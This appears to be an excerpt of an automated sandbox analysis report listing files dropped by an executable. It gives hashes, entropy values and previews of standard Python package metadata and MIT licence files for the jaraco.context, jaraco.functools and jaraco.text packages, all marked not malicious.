                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (406)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4020
                                                                                                                                                                                                                              Entropy (8bit):4.99859161164956
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:D6P4YaCP1gGRbHneRohWYc+f/PCnG9rulJQ84UNxCUSwTcL:kPqGRbHneRohWJ+XPaqylW/USwTcL
                                                                                                                                                                                                                              MD5:812F27A7C8C748351DC1643D58B6B250
                                                                                                                                                                                                                              SHA1:AC9C92013B2F0FC65D741B32A9FE4B956DD6EB7D
                                                                                                                                                                                                                              SHA-256:C43B60B897A3D2D37D8845C252FC44261D9AEF171E21154111A9012D2AFFFED6
                                                                                                                                                                                                                              SHA-512:CAC62C3682F808D85233B69F1C142B5A0E95E316E4BDCBC6EE253583EC302FA42E635BAB6A837327D8CE5D26C08C8DCD9E45D5CFDD8346B4501C473250D66953
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: jaraco.context.Version: 5.3.0.Summary: Useful decorators and context managers.Home-page: https://github.com/jaraco/jaraco.context.Author: Jason R. Coombs.Author-email: jaraco@jaraco.com.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: backports.tarfile ; python_version < "3.12".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest !=8.1.1,>=6 ; extra == 'testing'.Requires-Dist: pytest-checkdocs >=2.4
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):641
                                                                                                                                                                                                                              Entropy (8bit):5.76835538630355
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TGA0a/2zDJAv/TnqfQlWJAL/fy9vKAGvAXCaaryBAl2VrkEQCXvbAT2r1S:TBn/2zDCvbqfuLO9FGoXamalKSCXzB1S
                                                                                                                                                                                                                              MD5:2B0A77624AE3903E42C3A8213E593796
                                                                                                                                                                                                                              SHA1:D63027FF018995D0620E2497BCE9678888A57667
                                                                                                                                                                                                                              SHA-256:55197B88A78443297BB2D827A75BAAE740B33896251D872835D4B4C75EC2F57E
                                                                                                                                                                                                                              SHA-512:C02FB1554F8F40158BB60F2B4EC07D80F71CFBFFB38463C5809385A7A2FF8DDB2BDFEFE9AE5E67F4DEC3D904A6E0925E565B0EE6363DD0C2ED5B03A96B056B18
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.context-5.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.context-5.3.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.context-5.3.0.dist-info/METADATA,sha256=xDtguJej0tN9iEXCUvxEJh2a7xceIRVBEakBLSr__tY,4020..jaraco.context-5.3.0.dist-info/RECORD,,..jaraco.context-5.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.context-5.3.0.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/__pycache__/context.cpython-312.pyc,,..jaraco/context.py,sha256=REoLIxDkO5MfEYowt_WoupNCRoxBS5v7YX2PbW8lIcs,9552..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                              Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                              MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                              SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                              SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                              SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2891
                                                                                                                                                                                                                              Entropy (8bit):5.034580807599395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DEmbsaC3J1x9Ie9okNGwQw8wQw2wTw0zCPU0+I65Jib0H++kv0gM5d0DT+heU04u:DEmgaCZ1nTGDbHRAnzpI6o+fX5dFSwTm
                                                                                                                                                                                                                              MD5:C2E6BDA7F1B03B39BF42D31B6DBF6C38
                                                                                                                                                                                                                              SHA1:B7A18F079DE22D10C4C318E54BD8C48177F91333
                                                                                                                                                                                                                              SHA-256:8B86946900D7FA38DD1102B9C1EBE17A0CB1F09C8B7E29F61F2BDA4A4DC51ECA
                                                                                                                                                                                                                              SHA-512:F4E892B3D41482E3B17642B1D722B6E2A8E8DD4833F0623C29ED2D50D55CFC68DA1F9756B4E08723DC89F3E552424096C92912AC4DA533FE8E2DC59DC19EA9CF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: jaraco.functools.Version: 4.0.1.Summary: Functools like those found in stdlib.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/jaraco.functools.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: more-itertools.Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest >=6 ;
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):843
                                                                                                                                                                                                                              Entropy (8bit):5.807846597836061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Tmn/2zDRvbqfuggoaGnXamZlKZBX3vpBvt+c0X4yWJV:TmnuXRzUuggDifZlmX/aWJV
                                                                                                                                                                                                                              MD5:85FB54BAFB143CD57D1787F7EF74FDB2
                                                                                                                                                                                                                              SHA1:A915BBCDF108A58F3DFC1783D9D4DD3B7F3CE23A
                                                                                                                                                                                                                              SHA-256:632AA7C04F7C4BCC01C027AF5B9BC76FE8958F4A181035B957A3BD3014BA248B
                                                                                                                                                                                                                              SHA-512:2A39B4C6F221F88EC61D584C8CD3CAD358E8C7B50E529192105A0A4144ED3C2A4CE8B630C39C18D20E27FE226A23E2DE23CDFF8E3D3693959B165A9A2F9047CD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.functools-4.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.functools-4.0.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.functools-4.0.1.dist-info/METADATA,sha256=i4aUaQDX-jjdEQK5wevhegyx8JyLfin2HyvaSk3FHso,2891..jaraco.functools-4.0.1.dist-info/RECORD,,..jaraco.functools-4.0.1.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.functools-4.0.1.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/functools/__init__.py,sha256=hEAJaS2uSZRuF_JY4CxCHIYh79ZpxaPp9OiHyr9EJ1w,16642..jaraco/functools/__init__.pyi,sha256=gk3dsgHzo5F_U74HzAvpNivFAPCkPJ1b2-yCd62dfnw,3878..jaraco/functools/__pycache__/__init__.cpython-312.pyc,,..jaraco/functools/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                              Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                              MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                              SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                              SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                              SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3658
                                                                                                                                                                                                                              Entropy (8bit):5.02710641474483
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DYMaCFS802Vpnu388Ksc+fIybwFiR8g6RSwTsL:pFz02Vpnu388KB+gybwgRd6RSwTsL
                                                                                                                                                                                                                              MD5:70FE732EDE8F8E6C84DA4EA21D4933E5
                                                                                                                                                                                                                              SHA1:A7763789FA56CEBBAA849368FAAC7D386F170399
                                                                                                                                                                                                                              SHA-256:03359D9BA56231F0CE3E840C7CB5A7DB380141218949CCAA78DDBD4DCB965D52
                                                                                                                                                                                                                              SHA-512:4C8D3D5078840BD4DBE20458EBF52890585C5911C22C3EFCE2FB28985461BC80469339DDAF6016FB099C84BDF9B41A26FF1884B456422A8D0C682104D7950D91
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: jaraco.text.Version: 3.12.1.Summary: Module for text manipulation.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/jaraco.text.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: jaraco.functools.Requires-Dist: jaraco.context >=4.1.Requires-Dist: autocommand.Requires-Dist: inflect.Requires-Dist: more-itertools.Requires-Dist: importlib-resources ; python_version < "3.9".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1500
                                                                                                                                                                                                                              Entropy (8bit):5.794249493238335
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:TkLFn/2zDVLFvbqfuaLFo2kXLFGnLFEsJiLFXamdLFlKbkZ6d3JpPXu/1XWXYXw2:TcnuXDzUuuCw5Jmfblyz3Jp2/NUsM0bN
                                                                                                                                                                                                                              MD5:39FCCE64BC768C2046067E4AAD8465F0
                                                                                                                                                                                                                              SHA1:2EFC0FC776576A8FE01BBACD0760A49EEE6481DA
                                                                                                                                                                                                                              SHA-256:816D945741DCA246099388CA3EED74FC0667ACBAA36F70B559B2494C3979B1F6
                                                                                                                                                                                                                              SHA-512:FB2335A6675F9CADEEE38B666FAB9EA1D8BFBA6B7768253D42F44149591A3239F4B2FA19DDF2C282DC7E47A01D7DCA69AADBBCDAC9107EDBCB2C22D11BA81287
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.text-3.12.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.text-3.12.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.text-3.12.1.dist-info/METADATA,sha256=AzWdm6ViMfDOPoQMfLWn2zgBQSGJScyqeN29TcuWXVI,3658..jaraco.text-3.12.1.dist-info/RECORD,,..jaraco.text-3.12.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..jaraco.text-3.12.1.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.text-3.12.1.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/text/Lorem ipsum.txt,sha256=N_7c_79zxOufBY9HZ3yzMgOkNv-TkOTTio4BydrSjgs,1335..jaraco/text/__init__.py,sha256=Y2YUqXR_orUoDaY4SkPRe6ZZhb5HUHB_Ah9RCNsVyho,16250..jaraco/text/__pycache__/__init__.cpython-312.pyc,,..jaraco/text/__pycache__/layouts.cpython-312.pyc,,..jaraco/text/__pycache__/show-newlines.cpython-312.pyc,,..jaraco/text/__pycache__/strip-prefix.cpython-312.pyc,,..jaraco/text/__py
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                              Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                              MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                              SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                              SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                              SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (888)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1335
                                                                                                                                                                                                                              Entropy (8bit):4.226823573023539
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
                                                                                                                                                                                                                              MD5:4CE7501F6608F6CE4011D627979E1AE4
                                                                                                                                                                                                                              SHA1:78363672264D9CD3F72D5C1D3665E1657B1A5071
                                                                                                                                                                                                                              SHA-256:37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
